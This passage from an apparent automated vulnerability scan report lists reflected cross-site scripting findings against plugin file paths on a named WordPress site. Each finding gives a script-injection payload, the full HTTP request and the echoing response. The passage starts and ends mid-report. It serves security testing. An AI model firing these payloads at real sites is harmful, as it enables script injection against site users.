Date: Wed, 02 Feb 2011 19:22:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674572+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674573; expires=Thu, 02-Feb-2012 19:22:53 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:53 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/defaulte93d9\"><script>alert(1)</script>b1176fcac2/default.css" />
...[SNIP]...

1.222. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d43c"><script>alert(1)</script>997d41182e2 was submitted in the REST URL parameter 9. This input was echoed as 5d43c\"><script>alert(1)</script>997d41182e2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css5d43c"><script>alert(1)</script>997d41182e2 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674575+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674575; expires=Thu, 02-Feb-2012 19:22:55 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css5d43c\"><script>alert(1)</script>997d41182e2" />
...[SNIP]...

1.223. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b259"><script>alert(1)</script>cf11bf0924a was submitted in the REST URL parameter 1. This input was echoed as 7b259\"><script>alert(1)</script>cf11bf0924a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site7b259"><script>alert(1)</script>cf11bf0924a/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site7b259\"><script>alert(1)</script>cf11bf0924a/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js" />
...[SNIP]...

1.224. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b83ff"><script>alert(1)</script>15d9ca5fa65 was submitted in the REST URL parameter 2. This input was echoed as b83ff\"><script>alert(1)</script>15d9ca5fa65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-contentb83ff"><script>alert(1)</script>15d9ca5fa65/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674581+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-contentb83ff\"><script>alert(1)</script>15d9ca5fa65/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js" />
...[SNIP]...

1.225. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30690"><script>alert(1)</script>04ae898bca was submitted in the REST URL parameter 3. This input was echoed as 30690\"><script>alert(1)</script>04ae898bca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins30690"><script>alert(1)</script>04ae898bca/superslider-postsincat/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins30690\"><script>alert(1)</script>04ae898bca/superslider-postsincat/js/mootools-1.2.3-core-yc.js" />
...[SNIP]...

1.226. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86e0b"><script>alert(1)</script>4f3b7f24e7a was submitted in the REST URL parameter 4. This input was echoed as 86e0b\"><script>alert(1)</script>4f3b7f24e7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat86e0b"><script>alert(1)</script>4f3b7f24e7a/js/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat86e0b\"><script>alert(1)</script>4f3b7f24e7a/js/mootools-1.2.3-core-yc.js" />
...[SNIP]...

1.227. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45505"><script>alert(1)</script>a19c334793e was submitted in the REST URL parameter 5. This input was echoed as 45505\"><script>alert(1)</script>a19c334793e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/js45505"><script>alert(1)</script>a19c334793e/mootools-1.2.3-core-yc.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674587+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/js45505\"><script>alert(1)</script>a19c334793e/mootools-1.2.3-core-yc.js" />
...[SNIP]...

1.228. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0ed6"><script>alert(1)</script>4a164db4c66 was submitted in the REST URL parameter 6. This input was echoed as b0ed6\"><script>alert(1)</script>4a164db4c66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.jsb0ed6"><script>alert(1)</script>4a164db4c66 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53395

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3-core-yc.jsb0ed6\"><script>alert(1)</script>4a164db4c66" />
...[SNIP]...

1.229. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e46a7"><script>alert(1)</script>c8efbec0fa1 was submitted in the REST URL parameter 1. This input was echoed as e46a7\"><script>alert(1)</script>c8efbec0fa1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitee46a7"><script>alert(1)</script>c8efbec0fa1/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:58 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674578+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674578; expires=Thu, 02-Feb-2012 19:22:58 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:58 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/sitee46a7\"><script>alert(1)</script>c8efbec0fa1/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js" />
...[SNIP]...

1.230. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2e52"><script>alert(1)</script>c7eda42390 was submitted in the REST URL parameter 2. This input was echoed as d2e52\"><script>alert(1)</script>c7eda42390 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-contentd2e52"><script>alert(1)</script>c7eda42390/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674580+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674580; expires=Thu, 02-Feb-2012 19:23:00 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:00 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53389

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-contentd2e52\"><script>alert(1)</script>c7eda42390/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js" />
...[SNIP]...

1.231. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65a5f"><script>alert(1)</script>825999123a4 was submitted in the REST URL parameter 3. This input was echoed as 65a5f\"><script>alert(1)</script>825999123a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins65a5f"><script>alert(1)</script>825999123a4/superslider-postsincat/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674582+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674582; expires=Thu, 02-Feb-2012 19:23:02 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:02 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins65a5f\"><script>alert(1)</script>825999123a4/superslider-postsincat/js/mootools-1.2.3.1-more.js" />
...[SNIP]...

1.232. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9979"><script>alert(1)</script>228c627681f was submitted in the REST URL parameter 4. This input was echoed as a9979\"><script>alert(1)</script>228c627681f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-postsincata9979"><script>alert(1)</script>228c627681f/js/mootools-1.2.3.1-more.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:03 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-postsincata9979\"><script>alert(1)</script>228c627681f/js/mootools-1.2.3.1-more.js" />
...[SNIP]...

1.233. http://wp-superslider.com/site/wp-content/plugins/superslider-postsincat/js/mootools-1.2.3.1-more.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
